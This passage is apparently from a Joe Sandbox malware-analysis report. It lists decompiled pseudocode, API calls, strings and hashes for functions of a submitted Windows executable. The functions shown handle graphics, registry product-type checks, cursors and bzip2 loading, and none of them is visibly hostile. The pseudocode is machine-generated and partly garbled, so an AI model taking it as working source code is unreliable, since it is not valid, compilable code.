					_v12 = _t34;
					_push(_v20);
					L00405CCC();
				}
				_v5 = GetDIBits(_v20, _t48, 0, _t37->bmiHeader.biHeight, _a8, _t37, 0) != 0;
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(0x41c1e2);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v20);
					L00405D0C();
				}
				_push(_v20);
				_t31 = _v16;
				_push(_t31);
				L004060FC();
				return _t31;
			}

0x0041c139
0x0041c13b
0x0041c13d
0x0041c146
0x0041c14d
0x0041c155
0x0041c158
0x0041c15b
0x0041c15c
0x0041c161
0x0041c166
0x0041c167
0x0041c16c
0x0041c16f
0x0041c174
0x0041c176
0x0041c178
0x0041c179
0x0041c17c
0x0041c17d
0x0041c182
0x0041c188
0x0041c189
0x0041c189
0x0041c1a7
0x0041c1ad
0x0041c1b0
0x0041c1b3
0x0041c1bc
0x0041c1be
0x0041c1c3
0x0041c1c7
0x0041c1c8
0x0041c1c8
0x0041c1d0
0x0041c1d1
0x0041c1d4
0x0041c1d5
0x0041c1da

APIs

Part of subcall function 0041C030: GetObjectA.GDI32(?,00000018), ref: 0041C03D

GetFocus.USER32 ref: 0041C150
740BAC50.USER32(?), ref: 0041C15C
740BB410.GDI32(?,?,00000000,00000000,0041C1DB,?,?), ref: 0041C17D
740BB150.GDI32(?,?,?,00000000,00000000,0041C1DB,?,?), ref: 0041C189
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1A0
740BB410.GDI32(?,00000000,00000000,0041C1E2,?,?), ref: 0041C1C8
740BB380.USER32(?,?,0041C1E2,?,?), ref: 0041C1D5

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: B410$B150B380BitsFocusObject
String ID:
API String ID: 514114485-0
Opcode ID: 1db970a339cff4feefedb0e536d61ab8ff4444c21f8c3a2e88a58ace013ddce6
Instruction ID: c0a2ed84afc4bd9bec2804e3d1f319e5299c8bb2955d2d1476203e1e1f035e2e
Opcode Fuzzy Hash: 1db970a339cff4feefedb0e536d61ab8ff4444c21f8c3a2e88a58ace013ddce6
Instruction Fuzzy Hash: BA113D71A44608BFDB10DBE9CC85FAFB7FCEF48704F54446AB514E7281D67899408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00418C3C Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00418C3C(void* __eax) {
				int _v8;
				intOrPtr _v12;
				char _v16;
				int _t15;
				intOrPtr _t17;
				intOrPtr _t21;
				int _t31;
				void* _t33;
				intOrPtr _t41;
				void* _t43;
				void* _t45;
				intOrPtr _t46;

				_t43 = _t45;
				_t46 = _t45 + 0xfffffff4;
				_t33 = __eax;
				if( *((short*)(__eax + 0x46)) == 0xffff) {
					return __eax;
				} else {
					_push(1);
					_push(1);
					_push(1);
					_push(GetSystemMetrics(0xe));
					_t15 = GetSystemMetrics(0xd);
					_push(_t15);
					L00409978();
					_v8 = _t15;
					_push(_t43);
					_push(0x418cf0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t46;
					_t17 =  *0x49a62c; // 0x2260660
					E00409998(_v8, E00423354(_t17,  *((short*)(_t33 + 0x46))));
					_t21 =  *0x49a62c; // 0x2260660
					E00409998(_v8, E00423354(_t21,  *((short*)(_t33 + 0x46))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L004099CC();
					_push( &_v16);
					_push(0);
					L004099DC();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L004099CC();
					_pop(_t41);
					 *[fs:eax] = _t41;
					_push(0x418cf7);
					_t31 = _v8;
					_push(_t31);
					L00409980();
					return _t31;
				}
			}

0x00418c3d
0x00418c3f
0x00418c43
0x00418c4a
0x00418cfb
0x00418c50
0x00418c50
0x00418c52
0x00418c54
0x00418c5d
0x00418c60
0x00418c65
0x00418c66
0x00418c6b
0x00418c70
0x00418c71
0x00418c76
0x00418c79
0x00418c80
0x00418c8f
0x00418c98
0x00418ca7
0x00418cac
0x00418cae
0x00418cb0
0x00418cb5
0x00418cb6
0x00418cbe
0x00418cbf
0x00418cc1
0x00418cc9
0x00418ccd
0x00418cce
0x00418cd3
0x00418cd4
0x00418cdb
0x00418cde
0x00418ce1
0x00418ce6
0x00418ce9
0x00418cea
0x00418cef
0x00418cef

APIs

GetSystemMetrics.USER32 ref: 00418C58
GetSystemMetrics.USER32 ref: 00418C60
6F507CB0.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C66

Part of subcall function 00409998: 6F500620.COMCTL32(0049A628,000000FF,00000000,00418C94,00000000,00418CF0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 0040999C

6F55BC60.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418CF0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CB6
6F55B6C0.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418CF0,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CC1
6F55BC60.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418CF0,?,00000000,0000000D,00000000), ref: 00418CD4
6F507D50.COMCTL32(0049A628,00418CF7,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418CF0,?,00000000,0000000D,00000000,0000000E), ref: 00418CEA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: F507MetricsSystem$F500620
String ID:
API String ID: 1376600452-0
Opcode ID: 1989086bad89f3295cbd6afa0bd7b054d8bc3cbdeab04a02c144c3b1874e0316
Instruction ID: c0a08d93c5194f224585cf3bb7457c2e62491c79a9a497740637926b19b7cdbe
Opcode Fuzzy Hash: 1989086bad89f3295cbd6afa0bd7b054d8bc3cbdeab04a02c144c3b1874e0316
Instruction Fuzzy Hash: 1E1136B1744204BBEB10EBA9DC82F9EB3B8DB08714F50446EB904F72D2EA799D408758

Uniqueness

Uniqueness Score: -1.00%

Function 00481BA8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00481BA8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				intOrPtr _t34;
				void* _t43;

				_v12 = 0;
				_push(_t43);
				_push(0x481c60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff8;
				if(E0042DD1C(0, "System\\CurrentControlSet\\Control\\ProductOptions", 0x80000002,  &_v8, 1, 0) != 0) {
					L9:
					_pop(_t34);
					 *[fs:eax] = _t34;
					_push(E00481C67);
					return E00403400( &_v12);
				}
				if(E0042DC4C() != 0) {
					if(E00406AA4(_v12, 0x481cb4) != 0) {
						if(E00406AA4(_v12, "LanmanNT") != 0) {
							if(E00406AA4(_v12, "ServerNT") == 0) {
								 *0x49b386 = 3;
							}
						} else {
							 *0x49b386 = 2;
						}
					} else {
						 *0x49b386 = 1;
					}
				}
				RegCloseKey(_v8);
				goto L9;
			}

0x00481bb3
0x00481bb8
0x00481bb9
0x00481bbe
0x00481bc1
0x00481bdf
0x00481c4a
0x00481c4c
0x00481c4f
0x00481c52
0x00481c5f
0x00481c5f
0x00481bf3
0x00481c04
0x00481c1e
0x00481c38
0x00481c3a
0x00481c3a
0x00481c20
0x00481c20
0x00481c20
0x00481c06
0x00481c06
0x00481c06
0x00481c04
0x00481c45
0x00000000

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00481C60), ref: 00481C45

Strings

LanmanNT, xrefs: 00481C0F
ProductType, xrefs: 00481BE4
ServerNT, xrefs: 00481C29
System\CurrentControlSet\Control\ProductOptions, xrefs: 00481BCC
WinNT, xrefs: 00481BF5

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
API String ID: 47109696-2530820420
Opcode ID: 8cd469757b18ad1c97b0f800bbce6090e307c49f28e2ceb9c7e79cfb5efc90bb
Instruction ID: b684dcc60905fe3996a31ab8ce1ff629bf6ac02f7a7c7ef89ea959ef4614f2a6
Opcode Fuzzy Hash: 8cd469757b18ad1c97b0f800bbce6090e307c49f28e2ceb9c7e79cfb5efc90bb
Instruction Fuzzy Hash: 72119D30688204ABDB11F766D941B9E7BACEB55344F60887BA840E72A2E77CDD02971D

Uniqueness

Uniqueness Score: -1.00%

Function 0041B44A Relevance: 10.6, APIs: 7, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041B44A() {
				void* _t40;
				void* _t43;
				void* _t44;

				if( *(_t44 - 0x10) != 0) {
					_t40 = SelectObject( *(_t44 - 0x18),  *(_t44 - 4));
					_t43 = SelectObject( *(_t44 - 0x1c),  *(_t44 - 0x10));
					StretchBlt( *(_t44 - 0x1c), 0, 0,  *(_t44 - 0xc),  *(_t44 - 8),  *(_t44 - 0x18), 0, 0,  *(_t44 - 0x30),  *(_t44 - 0x2c), 0xcc0020);
					if(_t40 != 0) {
						SelectObject( *(_t44 - 0x18), _t40);
					}
					if(_t43 != 0) {
						SelectObject( *(_t44 - 0x1c), _t43);
					}
				}
				DeleteDC( *(_t44 - 0x18));
				DeleteDC( *(_t44 - 0x1c));
				return  *(_t44 - 0x10);
			}

0x0041b44e
0x0041b45d
0x0041b46c
0x0041b493
0x0041b49a
0x0041b4a1
0x0041b4a1
0x0041b4a8
0x0041b4af
0x0041b4af
0x0041b4a8
0x0041b4b8
0x0041b4c1
0x0041b4cf

APIs

SelectObject.GDI32(00000000,?), ref: 0041B458
SelectObject.GDI32(?,00000000), ref: 0041B467
StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B493
SelectObject.GDI32(00000000,00000000), ref: 0041B4A1
SelectObject.GDI32(?,00000000), ref: 0041B4AF
DeleteDC.GDI32(00000000), ref: 0041B4B8
DeleteDC.GDI32(?), ref: 0041B4C1

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ObjectSelect$Delete$Stretch
String ID:
API String ID: 1458357782-0
Opcode ID: dfa175311f9ed4f4c58f5f79a9db12cdb3c018b6ff94d951a92190f0251cabe9
Instruction ID: 7e0e064550abd0227ef511235a7a95d8cdbd035160633462ab43f6f1e02ee56a
Opcode Fuzzy Hash: dfa175311f9ed4f4c58f5f79a9db12cdb3c018b6ff94d951a92190f0251cabe9
Instruction Fuzzy Hash: 88114C72E00555ABDF10DAD9D885FAFB3BCEF08714F048456B714FB241C678A8418B94

Uniqueness

Uniqueness Score: -1.00%

Function 0049379C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0049379C(struct HDC__* __eax, void* __ebx, long* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				struct tagTEXTMETRICA _v72;
				signed int _t25;
				signed int _t26;
				struct HDC__* _t32;
				intOrPtr _t41;
				long* _t43;
				signed int* _t45;
				void* _t48;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t43 = __ecx;
				_t45 = __edx;
				_push(0);
				L00405F14();
				_v8 = __eax;
				_push(_t48);
				_push(0x493828);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xffffffbc;
				SelectObject(_v8, E0041A1D0(__eax, __eax, __ecx, __ecx, __edx));
				GetTextExtentPointA(_v8, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16);
				asm("cdq");
				_t25 = _v16.cx / 0x1a + 1;
				_t26 = _t25 >> 1;
				if(_t25 < 0) {
					asm("adc eax, 0x0");
				}
				 *_t45 = _t26;
				GetTextMetricsA(_v8,  &_v72);
				 *_t43 = _v72.tmHeight;
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E0049382F);
				_t32 = _v8;
				_push(_t32);
				_push(0);
				L004060FC();
				return _t32;
			}

0x004937a2
0x004937a3
0x004937a4
0x004937a5
0x004937a7
0x004937ab
0x004937ad
0x004937b2
0x004937b7
0x004937b8
0x004937bd
0x004937c0
0x004937cf
0x004937e3
0x004937f0
0x004937f3
0x004937f4
0x004937f6
0x004937f8
0x004937f8
0x004937fb
0x00493805
0x0049380d
0x00493811
0x00493814
0x00493817
0x0049381c
0x0049381f
0x00493820
0x00493822
0x00493827

APIs

740BAC50.USER32(00000000,?,?,00000000), ref: 004937AD

Part of subcall function 0041A1D0: CreateFontIndirectA.GDI32(?), ref: 0041A28F

SelectObject.GDI32(00000000,00000000), ref: 004937CF
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493D4D), ref: 004937E3
GetTextMetricsA.GDI32(00000000,?), ref: 00493805
740BB380.USER32(00000000,00000000,0049382F,00493828,?,00000000,?,?,00000000), ref: 00493822

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004937DA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Text$B380CreateExtentFontIndirectMetricsObjectPointSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 3658053993-222967699
Opcode ID: 8461727ccacdfea1df1a901815be96565a1c00da7cdafb8fae174f5bde628484
Instruction ID: dd40f6f40881701da2d52a3e9ff9f2cabee02c50412c364729264e1edb3e3874
Opcode Fuzzy Hash: 8461727ccacdfea1df1a901815be96565a1c00da7cdafb8fae174f5bde628484
Instruction Fuzzy Hash: D2018875A04604BFDB00EFE5CC41F5EB7ECDB49704F514476B504E7281D678AE009B68

Uniqueness

Uniqueness Score: -1.00%

Function 0042337C Relevance: 10.6, APIs: 7, Instructions: 56
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0042337C(long __eax, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				struct HWND__* _t26;
				short _t27;
				void* _t29;
				struct tagPOINT* _t30;

				_t7 = __eax;
				_t30 = _t29 + 0xfffffff8;
				_t27 = __edx;
				_t19 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x28))) {
					 *((short*)(__eax + 0x28)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E00423354(_t19, _t27));
					} else {
						GetCursorPos(_t30);
						_push(_v24.y);
						_t26 = WindowFromPoint(_v24);
						if(_t26 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t26, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t26, 0x20, _t26, E0040625C(SendMessageA(_t26, 0x84, _v24, _v24.y), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x0042337c
0x00423380
0x00423383
0x00423385
0x0042338b
0x0042338d
0x00423394
0x004233f0
0x004233fb
0x00423396
0x00423397
0x0042339c
0x004233a9
0x004233ad
0x00000000
0x004233af
0x004233b2
0x004233c0
0x00000000
0x004233c2
0x004233e9
0x004233e9
0x004233c0
0x004233ad
0x00423394
0x00423406

APIs

GetCursorPos.USER32 ref: 00423397
WindowFromPoint.USER32(?,?), ref: 004233A4
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233B2
GetCurrentThreadId.KERNEL32 ref: 004233B9
SendMessageA.USER32 ref: 004233D2
SendMessageA.USER32 ref: 004233E9
SetCursor.USER32(00000000), ref: 004233FB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 389571a9155bf0d44146e1c3e2fcb98a57e86d710fd11e1e3fcea33d6388c2dc
Instruction ID: d1a59ef539c994cdea214d0305b14f31a3db8a311ec8a747cf93f35c87281e80
Opcode Fuzzy Hash: 389571a9155bf0d44146e1c3e2fcb98a57e86d710fd11e1e3fcea33d6388c2dc
Instruction Fuzzy Hash: F701D82230431026D6217B795C86E2F66A8CFC5B55F50413FB905BA283D93D9D01536D

Uniqueness

Uniqueness Score: -1.00%

Function 004935C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004935C0(void* __eax, void* __edx) {
				void _v52;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t13;
				void* _t18;
				intOrPtr* _t22;
				void* _t25;
				intOrPtr* _t26;

				_t18 = __edx;
				_t25 = __eax;
				_t12 = GetModuleHandleA("user32.dll");
				_t22 = GetProcAddress(_t12, "MonitorFromRect");
				_t13 = GetProcAddress(_t12, "GetMonitorInfoA");
				if(_t22 == 0 || _t13 == 0) {
					L4:
					return E00493588(1, _t18);
				} else {
					_t9 =  *_t22(_t25, 2);
					 *_t26 = 0x28;
					_push(_t26);
					_push(_t9);
					if( *_t13() == 0) {
						goto L4;
					}
					_push(_t18);
					return memcpy(_t18,  &_v52, 4 << 2);
				}
			}

0x004935c7
0x004935c9
0x004935d5
0x004935e2
0x004935ef
0x004935f3
0x0049361e
0x00000000
0x004935f9
0x004935fc
0x00493600
0x00493607
0x00493608
0x0049360d
0x00000000
0x00000000
0x0049360f
0x00000000
0x0049361b

APIs

GetModuleHandleA.KERNEL32(user32.dll), ref: 004935D0
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004935DD
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004935EA

Strings

user32.dll, xrefs: 004935CB
MonitorFromRect, xrefs: 004935D7
GetMonitorInfoA, xrefs: 004935E4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
API String ID: 667068680-2254406584
Opcode ID: b93ec3be6ad25ce28c378c1e4d937ab42271d583ea12c6acc836fdba75f8bdd8
Instruction ID: 7bca0d46b8794983a04fb8f4f732d7e1003289be8492f80686068f2104363fa3
Opcode Fuzzy Hash: b93ec3be6ad25ce28c378c1e4d937ab42271d583ea12c6acc836fdba75f8bdd8
Instruction Fuzzy Hash: EBF0F692B0175476DE302DB60C81E7B698CCB86B72F040037BD44A7383ED5DCE0546AD

Uniqueness

Uniqueness Score: -1.00%

Function 00456E40 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00456E40(HANDLE* __eax) {
				HANDLE* _v8;
				char _v12;
				intOrPtr _t7;
				long _t10;
				intOrPtr _t27;
				void* _t30;

				_v8 = __eax;
				_push(_t30);
				_push(0x456ebd);
				_push( *[fs:edx]);
				 *[fs:edx] = _t30 + 0xfffffff8;
				do {
					_t7 =  *0x49a628; // 0x2262410
					E00424494(_t7);
					_t10 = MsgWaitForMultipleObjects(1, _v8, 0, 0xffffffff, 0xff);
				} while (_t10 == 1);
				if(_t10 + 1 == 0) {
					E004527FC("MsgWaitForMultipleObjects");
				}
				_t3 =  &_v12; // 0x496a42
				if(GetExitCodeProcess( *_v8, _t3) == 0) {
					E004527FC("GetExitCodeProcess");
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E00456EC4);
				return CloseHandle( *_v8);
			}

0x00456e46
0x00456e4b
0x00456e4c
0x00456e51
0x00456e54
0x00456e57
0x00456e57
0x00456e5c
0x00456e70
0x00456e75
0x00456e7b
0x00456e82
0x00456e82
0x00456e87
0x00456e98
0x00456e9f
0x00456e9f
0x00456ea6
0x00456ea9
0x00456eac
0x00456ebc

APIs

MsgWaitForMultipleObjects.USER32 ref: 00456E70
GetExitCodeProcess.KERNEL32 ref: 00456E91
CloseHandle.KERNEL32(?,00456EC4,?,00000000,000000FF,000000FF,00000000,00456EBD,?,00000000,00000000,00002018,000000FF,00498AE4), ref: 00456EB7

Strings

MsgWaitForMultipleObjects, xrefs: 00456E7D
GetExitCodeProcess, xrefs: 00456E9A
BjI, xrefs: 00456E87, 00456E8A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: BjI$GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3225529542
Opcode ID: 99ce4a1b0babe4c246de8794e00a0f6f13a283ff9a7e4f00f62208de1080ae0c
Instruction ID: d886056a02a72292ce6438298cb32dc427d01a0b9ddaaab929798cf94f85d4fb
Opcode Fuzzy Hash: 99ce4a1b0babe4c246de8794e00a0f6f13a283ff9a7e4f00f62208de1080ae0c
Instruction Fuzzy Hash: AF01DB78604200AFDB10EBA9C902A1A73A8EB49714FA1457BF810EB2D2CA7C9D049618

Uniqueness

Uniqueness Score: -1.00%

Function 0045CA24 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045CA24(struct HINSTANCE__* __eax) {
				intOrPtr _t5;
				struct HINSTANCE__* _t6;

				_t6 = __eax;
				 *0x49b038 = GetProcAddress(__eax, "BZ2_bzDecompressInit");
				 *0x49b03c = GetProcAddress(_t6, "BZ2_bzDecompress");
				 *0x49b040 = GetProcAddress(_t6, "BZ2_bzDecompressEnd");
				if( *0x49b038 == 0 ||  *0x49b03c == 0 ||  *0x49b040 == 0) {
					_t5 = 0;
				} else {
					_t5 = 1;
				}
				if(_t5 == 0) {
					 *0x49b038 = 0;
					 *0x49b03c = 0;
					 *0x49b040 = 0;
					return _t5;
				}
				return _t5;
			}

0x0045ca25
0x0045ca32
0x0045ca42
0x0045ca52
0x0045ca5e
0x0045ca72
0x0045ca76
0x0045ca76
0x0045ca76
0x0045ca7a
0x0045ca7e
0x0045ca86
0x0045ca8e
0x00000000
0x0045ca8e
0x0045ca95

APIs

GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045CA2D
GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045CA3D
GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045CA4D

Strings

BZ2_bzDecompressEnd, xrefs: 0045CA47
BZ2_bzDecompress, xrefs: 0045CA37
BZ2_bzDecompressInit, xrefs: 0045CA27

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc
String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
API String ID: 190572456-212574377
Opcode ID: 06c6b3f32bb7345a94d69f1be61e8643689e0f97731b33e76babeefbcb69a411
Instruction ID: 7fb22dad6ed3894bffbe773f62540c0402b5f98a7fc92762d290ad48bf5bf345
Opcode Fuzzy Hash: 06c6b3f32bb7345a94d69f1be61e8643689e0f97731b33e76babeefbcb69a411
Instruction Fuzzy Hash: DCF0F9B0540308DEDB24DB72BDC97232AA5E7A4756F14813B9815A52A2E37C0848CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0042E868 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042E868(void* __eax, void* __edx) {
				void* _t8;
				void* _t10;

				_t8 = __edx;
				_t10 = __eax;
				if( *0x49a668 == 0) {
					 *0x49a66c = GetProcAddress(GetModuleHandleA("user32.dll"), "ChangeWindowMessageFilterEx");
					InterlockedExchange(0x49a668, 1);
				}
				if( *0x49a66c == 0) {
					return E0042E7F8(_t8);
				} else {
					return  *0x49a66c(_t10, _t8, 1, 0);
				}
			}

